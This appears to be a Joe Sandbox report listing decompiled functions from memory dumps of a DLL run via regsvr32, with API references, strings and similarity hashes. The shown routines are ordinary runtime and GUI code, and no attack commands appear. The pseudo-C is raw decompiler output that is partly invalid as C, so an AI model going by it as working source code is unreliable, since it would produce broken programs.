char_traits.LIBCPMTD ref: 00007FFA0AE6354E

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
String ID:
API String ID: 1550686663-0
Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction ID: 19ff0b25725ff6d0bacc67158e1e14e3c467c299f4cf2c5509c4da0929a16f7a
Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction Fuzzy Hash: C3D1A877A1DBD185DA70EB65F4913AAB361FBC97C4F008522DA8D83B6ADF2CD0448B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE73CB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97registrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFA0AE73D39
RegisterTouchWindow.USER32 ref: 00007FFA0AE73D5A
MessageBoxW.USER32 ref: 00007FFA0AE73D7A

Strings

Cannot register application window for multi-touch input, xrefs: 00007FFA0AE73D6E
Error, xrefs: 00007FFA0AE73D67

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Window$CreateMessageRegisterTouch
String ID: Cannot register application window for multi-touch input$Error
API String ID: 490141109-480840240
Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction ID: 93f161f7b93050e8ec454777073de3e22a755ebbbe6ed07109c2e6d7529d92d2
Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction Fuzzy Hash: AE511A33908B6282E750EB25F89436A73A0FB86B94F508576D58E47774EF7CE044D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE62FC0 Relevance: 15.1, APIs: 10, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FFA7FFA0AE62FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				long long _t108;
				long long _t110;
				intOrPtr* _t112;
				intOrPtr _t116;
				long long _t118;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0xae6303c;
				E00007FFA7FFA0AE618F0(__rax, _a8);
				_t100 = _a32 - __rax;
				_v64 = _a40;
				_v72 = _t100;
				E00007FFA7FFA0AE63240(__edx, E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
				goto 0xae63214;
				E00007FFA7FFA0AE621F0(E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
				E00007FFA7FFA0AE62400(E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
				_a24 = _t100;
				_t102 = 0xffffffff - _a40;
				_v40 = 0xffffffff;
				E00007FFA7FFA0AE62170(_t102, _a8);
				_t104 =  *_t102 - _a24;
				if (_v40 - 0xffffffff > 0) goto 0xae630aa;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170(_t104, _a8);
				_v56 =  *_t104 - _a24 - _a16;
				_t108 = _a24;
				if (_a40 - _t108 >= 0) goto 0xae63126;
				E00007FFA7FFA0AE618F0(_t108, _a8);
				_t110 = _t108 + _a16 + _a24;
				_v32 = _t110;
				E00007FFA7FFA0AE618F0(_t110, _a8);
				_t112 = _t110 + _a16 + _a40;
				E00007FFA7FFA0AE61230(_t112, _v32, _v56);
				E00007FFA7FFA0AE62170(_t112, _a8);
				_v48 =  *_t112 + _a40 - _a24;
				if (_a40 > 0) goto 0xae63162;
				if (_a24 <= 0) goto 0xae6320f;
				r8d = 0;
				if ((E00007FFA7FFA0AE622B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0xae6320f;
				_t116 = _a40;
				if (_a24 - _t116 >= 0) goto 0xae631d9;
				E00007FFA7FFA0AE618F0(_t116, _a8);
				_t118 = _t116 + _a16 + _a24;
				_v24 = _t118;
				E00007FFA7FFA0AE618F0(_t118, _a8);
				_t120 = _t118 + _a16 + _a40;
				E00007FFA7FFA0AE61230(_t118 + _a16 + _a40, _v24, _v56);
				E00007FFA7FFA0AE618F0(_t118 + _a16 + _a40, _a8);
				E00007FFA7FFA0AE611E0(_t120 + _a16, _a32, _a40);
				return E00007FFA7FFA0AE623A0(_t120 + _a16, _a8, _v48);
			}

APIs

Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6226B
Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE62FF6

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Part of subcall function 00007FFA0AE63240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE63310
Part of subcall function 00007FFA0AE63240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633A8
Part of subcall function 00007FFA0AE63240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633C2
Part of subcall function 00007FFA0AE63240: char_traits.LIBCPMTD ref: 00007FFA0AE633E2

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE630A5
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE630E3
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE630FF
char_traits.LIBCPMTD ref: 00007FFA0AE63121
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63196
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE631B2
char_traits.LIBCPMTD ref: 00007FFA0AE631D4
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE631DE
char_traits.LIBCPMTD ref: 00007FFA0AE631FB

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
String ID:
API String ID: 4284633421-0
Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction ID: 5bc97bbf82d95cb72c9306703566606803c97622fb47735216cbf19e36c7e388
Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction Fuzzy Hash: 0B51C037A1CAD186DA50EB79F45136AA3A0FBC57C4F105562EBCD87B6ADF2CD4418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6893C Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FFA7FFA0AE6893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t155;
				void* _t185;
				signed short _t199;
				signed short _t200;
				signed int _t201;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed short* _t380;
				signed short* _t381;
				signed short* _t382;
				signed short* _t384;
				signed short** _t385;
				long long _t386;
				long long* _t389;
				signed short* _t390;
				long long* _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				long long _t406;
				signed short* _t407;
				long long _t408;
				intOrPtr _t409;

				_t403 = __r8;
				_t394 = __rdx;
				_t386 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t406 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t255 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t406;
				_t397 = __rdx;
				if (_t406 != 0) goto 0xae68987;
				E00007FFA7FFA0AE6B420(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA0AE69744();
				goto 0xae689b9;
				if (r14d == 0) goto 0xae689d1;
				_t4 = _t403 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0xae689d1;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t408;
				E00007FFA7FFA0AE69674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t389 = _t397[1];
				if (_t389 == 0) goto 0xae6901d;
				 *_t389 =  *_t397;
				goto 0xae6901d;
				 *_t394 = _t406 + 2;
				_t260 = r13d;
				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0xae689fb;
				0xae69140();
				goto 0xae689fb;
				_t378 =  *_t397;
				 *_t397 =  &(( *_t397)[1]);
				if (E00007FFA7FFA0AE6B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0xae689ee;
				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0xae68a32;
				_t380 =  *_t397;
				_t199 =  *_t380 & 0x0000ffff;
				_t381 =  &(_t380[1]);
				 *_t397 = _t381;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t381 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0xae68da0;
				if (_t199 - 0x30 < 0) goto 0xae68cef;
				if (_t199 - 0x3a >= 0) goto 0xae68b3e;
				goto 0xae68cea;
				if (_t199 - 0xff10 >= 0) goto 0xae68cdb;
				if (_t199 - r8w < 0) goto 0xae68cef;
				if (_t199 - 0x66a >= 0) goto 0xae68b66;
				goto 0xae68cea;
				if (_t199 - r10w < 0) goto 0xae68cef;
				if (_t199 - 0x6fa >= 0) goto 0xae68b85;
				goto 0xae68cea;
				if (_t199 - r11w < 0) goto 0xae68cef;
				if (_t199 - 0x970 >= 0) goto 0xae68ba4;
				goto 0xae68cea;
				if (_t199 - r9w < 0) goto 0xae68cef;
				if (_t199 - 0x9f0 >= 0) goto 0xae68bc3;
				goto 0xae68cea;
				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0xae68cef;
				if (_t199 - _a16 >= 0) goto 0xae68be3;
				goto 0xae68cea;
				if (_t199 - _v152 < 0) goto 0xae68cef;
				if (_t199 - _v148 < 0) goto 0xae68b34;
				if (_t199 - _v144 < 0) goto 0xae68cef;
				if (_t199 - _v140 < 0) goto 0xae68b34;
				if (_t199 - _v136 < 0) goto 0xae68cef;
				if (_t199 - _v132 < 0) goto 0xae68b34;
				if (_t199 - _v128 < 0) goto 0xae68cef;
				if (_t199 - _v124 < 0) goto 0xae68b34;
				if (_t199 - _v120 < 0) goto 0xae68cef;
				if (_t199 - _v116 < 0) goto 0xae68b34;
				if (_t199 - _v112 < 0) goto 0xae68cef;
				if (_t199 - _v108 < 0) goto 0xae68b34;
				if (_t199 - _v104 < 0) goto 0xae68cef;
				if (_t199 - _v100 < 0) goto 0xae68b34;
				if (_t199 - _v96 < 0) goto 0xae68cef;
				if (_t199 - _v92 < 0) goto 0xae68b34;
				if (_t199 - _v88 < 0) goto 0xae68cef;
				if (_t199 - _v84 < 0) goto 0xae68b34;
				if (_t199 - _v80 < 0) goto 0xae68cef;
				if (_t199 - _v76 < 0) goto 0xae68b34;
				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0xae68cef;
				goto 0xae68b34;
				if (_t199 - _v68 >= 0) goto 0xae68cef;
				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xae68d11;
				_t64 = _t389 - 0x41; // -17
				_t65 = _t389 - 0x61; // -49
				_t155 = _t65;
				if (_t64 - 0x19 <= 0) goto 0xae68d06;
				if (_t155 - 0x19 > 0) goto 0xae68d91;
				if (_t155 - 0x19 > 0) goto 0xae68d0e;
				_t66 = _t389 - 0x37; // -231
				if (_t66 != 0) goto 0xae68d91;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t250 =  *_t390 & 0x0000ffff;
				_t67 =  &(_t390[1]); // 0xffe1
				_t404 = _t67;
				 *_t397 = _t404;
				_t68 = _t394 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0xae68d79;
				 *_t397 = _t390;
				_t159 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t250 == 0) goto 0xae68d71;
				if ( *_t390 == _t250) goto 0xae68d71;
				E00007FFA7FFA0AE6B420(_t381);
				 *_t381 = 0x16;
				E00007FFA7FFA0AE69744();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0xae68da0;
				r8d = 0x660;
				goto 0xae68da0;
				_t200 =  *_t404 & 0x0000ffff;
				_t71 =  &(_t404[1]); // 0xffe3
				_t382 = _t71;
				 *_t397 = _t382;
				r8d = 0x660;
				goto 0xae68d96;
				_t164 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t200 - r12w < 0) goto 0xae68f70;
				if (_t200 - 0x3a >= 0) goto 0xae68dd2;
				goto 0xae68f6b;
				if (_t200 - r15w >= 0) goto 0xae68f5b;
				if (_t200 - r8w < 0) goto 0xae68f70;
				if (_t200 - 0x66a >= 0) goto 0xae68dfb;
				goto 0xae68f6b;
				if (_t200 - r10w < 0) goto 0xae68f70;
				if (_t200 - 0x6fa >= 0) goto 0xae68e1a;
				goto 0xae68f6b;
				if (_t200 - r11w < 0) goto 0xae68f70;
				if (_t200 - 0x970 >= 0) goto 0xae68e39;
				goto 0xae68f6b;
				if (_t200 - 0x9e6 < 0) goto 0xae68f70;
				_t76 =  &(_t382[5]); // 0x9f0
				if (_t200 - _t76 >= 0) goto 0xae68e59;
				goto 0xae68f6b;
				if (_t200 - 0xa66 < 0) goto 0xae68f70;
				if (_t200 - _a16 < 0) goto 0xae68e4f;
				if (_t200 - _v152 < 0) goto 0xae68f70;
				if (_t200 - _v148 < 0) goto 0xae68e4f;
				if (_t200 - _v144 < 0) goto 0xae68f70;
				if (_t200 - _v140 < 0) goto 0xae68e4f;
				if (_t200 - _v136 < 0) goto 0xae68f70;
				if (_t200 - _v132 < 0) goto 0xae68e4f;
				if (_t200 - _v128 < 0) goto 0xae68f70;
				if (_t200 - _v124 < 0) goto 0xae68e4f;
				if (_t200 - _v120 < 0) goto 0xae68f70;
				if (_t200 - _v116 < 0) goto 0xae68e4f;
				if (_t200 - _v112 < 0) goto 0xae68f70;
				if (_t200 - _v108 < 0) goto 0xae68e4f;
				if (_t200 - _v104 < 0) goto 0xae68f70;
				if (_t200 - _v100 < 0) goto 0xae68e4f;
				if (_t200 - _v96 < 0) goto 0xae68f70;
				if (_t200 - _v92 < 0) goto 0xae68e4f;
				if (_t200 - _v88 < 0) goto 0xae68f70;
				if (_t200 - _v84 < 0) goto 0xae68e4f;
				if (_t200 - _v80 < 0) goto 0xae68f70;
				if (_t200 - _v76 < 0) goto 0xae68e4f;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0xae68f70;
				goto 0xae68f6b;
				if (_t200 - _v68 >= 0) goto 0xae68f70;
				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0xae68f93;
				_t100 = _t390 - 0x41; // -65
				_t101 = _t390 - 0x61; // -97
				_t185 = _t101;
				if (_t100 - 0x19 <= 0) goto 0xae68f83;
				if (_t185 - 0x19 > 0) goto 0xae68f90;
				if (_t185 - 0x19 > 0) goto 0xae68f8b;
				goto 0xae68f93;
				_t405 =  *_t397;
				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0xae68fd7;
				_t201 =  *_t405 & 0x0000ffff;
				_t254 = _t382 + _t390;
				_t261 = _t254;
				_t107 =  &(_t405[1]); // 0x2
				r8d = 0x660;
				 *_t397 = _t107;
				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0xae68db7;
				_t409 = _a8;
				_t109 = _t405 - 2; // -2
				_t384 = _t109;
				_t407 = _v64;
				 *_t397 = _t384;
				if (_t201 == 0) goto 0xae69008;
				if ( *_t384 == _t201) goto 0xae69008;
				E00007FFA7FFA0AE6B420(_t384);
				 *_t384 = 0x16;
				E00007FFA7FFA0AE69744();
				if ((sil & 0x00000008) != 0) goto 0xae69024;
				_t385 = _t397[1];
				 *_t397 = _t407;
				if (_t385 == 0) goto 0xae6901d;
				 *_t385 = _t407;
				goto 0xae690a8;
				r8d = 0x80000000;
				_t114 = _t405 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0xae6904c;
				if ((sil & 0x00000001) == 0) goto 0xae6908f;
				if ((sil & 0x00000002) == 0) goto 0xae69047;
				if (_t261 - r8d <= 0) goto 0xae69095;
				goto 0xae6904c;
				if (_t261 - r9d <= 0) goto 0xae69097;
				 *((char*)(_t409 + 0x30)) = 1;
				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
				if ((_t258 & 0x00000001) != 0) goto 0xae69067;
				goto 0xae69097;
				_t395 = _t397[1];
				if ((_t258 & 0x00000002) == 0) goto 0xae6907f;
				if (_t395 == 0) goto 0xae6907a;
				 *_t395 =  *_t397;
				goto 0xae690a8;
				if (_t395 == 0) goto 0xae6908a;
				 *_t395 =  *_t397;
				goto 0xae690a8;
				if ((sil & 0x00000002) == 0) goto 0xae69097;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0xae690a6;
				 *_t396 =  *_t397;
				return  ~(_t261 | 0xffffffff);
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE68980
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE68D58
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE69003

Strings

0, xrefs: 00007FFA0AE68DA8
-, xrefs: 00007FFA0AE68A16
f, xrefs: 00007FFA0AE68AA2
p, xrefs: 00007FFA0AE68A32
p, xrefs: 00007FFA0AE68AAA

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$0$f$p$p
API String ID: 3215553584-1865143739
Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction ID: 4bf176edc45f0702acce830ba3b9b85f13e0e3ccf9d2799f0405bd9189d2ef48
Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction Fuzzy Hash: 5312B273A0816386FB60BF34F0542796692FB927D4F848972E69D466C4EF7DE4808B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE72FA0 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFA0AE72FCD
SelectObject.GDI32 ref: 00007FFA0AE72FE5
Polyline.GDI32 ref: 00007FFA0AE73230
MoveToEx.GDI32 ref: 00007FFA0AE7325C
LineTo.GDI32 ref: 00007FFA0AE73285
MoveToEx.GDI32 ref: 00007FFA0AE732B1
LineTo.GDI32 ref: 00007FFA0AE732DA
SelectObject.GDI32 ref: 00007FFA0AE732ED
DeleteObject.GDI32 ref: 00007FFA0AE732F8

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction ID: 31bfd468712f197fd607aed100dbdd9a98d3d0e0f8556e3f3c97aa76db8a7432
Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction Fuzzy Hash: C691CA76618B408BDB65DB28F05132AF7A5F7C9784F108226DACE97B69DF2CD4498F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6D8F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00007FFA7FFA0AE6D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0xaede008; // 0x81ced31fdcd6
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ffa0ae60000 + 0x7f840 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0xae6da36;
				if (_t72 == 0) goto 0xae6d959;
				_t57 = _t72;
				goto 0xae6da38;
				if (__r8 == __r9) goto 0xae6da1b;
				_t61 =  *((intOrPtr*)(0x7ffa0ae60000 + 0x7f7a0 + __rsi * 8));
				if (_t61 == 0) goto 0xae6d980;
				if (_t61 != _t76) goto 0xae6da75;
				goto 0xae6da07;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t99, _t96);
				if (_t57 != 0) goto 0xae6da55;
				if (GetLastError() != 0x57) goto 0xae6d9f5;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FFA7FFA0AE6F5B0(_t90) == 0) goto 0xae6d9f5;
				r8d = _t37;
				if (E00007FFA7FFA0AE6F5B0(_t90) == 0) goto 0xae6d9f5;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0xae6da55;
				 *((intOrPtr*)(0x7ffa0ae60000 + 0x7f7a0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0xae6d962;
				_t91 =  *0xaede008; // 0x81ced31fdcd6
				asm("dec eax");
				 *(0x7ffa0ae60000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

APIs

FreeLibrary.KERNEL32 ref: 00007FFA0AE6DA6F
GetProcAddress.KERNEL32 ref: 00007FFA0AE6DA7B

Strings

ext-ms-, xrefs: 00007FFA0AE6D9CC
api-ms-, xrefs: 00007FFA0AE6D9B9

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

